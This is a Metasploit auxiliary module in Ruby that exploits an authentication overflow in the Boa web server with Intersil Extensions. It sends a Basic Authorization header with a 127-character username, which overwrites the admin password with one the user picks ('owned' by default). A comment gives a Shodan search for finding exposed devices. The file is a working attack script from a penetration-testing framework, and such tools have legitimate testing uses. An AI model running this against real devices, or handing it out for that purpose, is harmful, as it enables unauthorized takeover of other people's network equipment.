##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Auxiliary
	
	# Exploit mixins should be called first
	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::WMAPScanServer
	include Msf::Auxiliary::Report

	def initialize
		super(
			'Name'        	=> 'Boa Authentication Bypass Exploit',
			'Version'     	=> '$Revision: $',
			'Description'	=> 'This module exploits the Boa Webserver with Intersil Extensions authentication overflow. Server: Boa/0.93.15 (with Intersil Extensions). This allows you to overwrite the current admin password with a password of your choosing.',
			# shodan dork: http://shodan.surtri.com/?q=Intersil
			'Author'        => ['CG'],
			'License'	=> MSF_LICENSE,
			'References'	=>
				[
					[ 'URL', 'http://www.milw0rm.com/exploits/4542' ],
					[ 'URL', 'http://www.securityfocus.com/archive/1/479434'],
				]
		)

		register_options(
			[
				OptString.new('PASSWORD', [ true, 'Desired Password', 'owned']),
			], self.class)
	
end

	def run
	
		begin
			user = 'a'*127
			pass = datastore['PASSWORD']
			user_pass = Rex::Text.encode_base64("#{user}" + ":" + "#{pass}")

			res = send_request_raw({
				'uri'     => "/home/index.shtml",
				'version'	=> "1.1",
				'method'  => 'GET',
				'headers' =>
					{
						'Authorization' => "Basic #{user_pass}",
					}
			}, 25)
			
			#print_status("#{res.headers}") #debug
			if (res and res.code != 401 and res.body =~ /Error 404: File Not Found/)
				print_status("#{datastore['RHOST']} is possibly vuln! received the correct #{res.code}\n Try to log in with admin:#{pass}")
			elsif 
				print_status("#{datastore['RHOST']} is not vuln. Check your headers. Correct Boa Version?")
				#print_status("#{res.headers}") #debug
				#print_status("#{res.body}") #debug
				end
			end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
		rescue ::Timeout::Error, ::Errno::EPIPE =>e
			puts e.message
	end
end


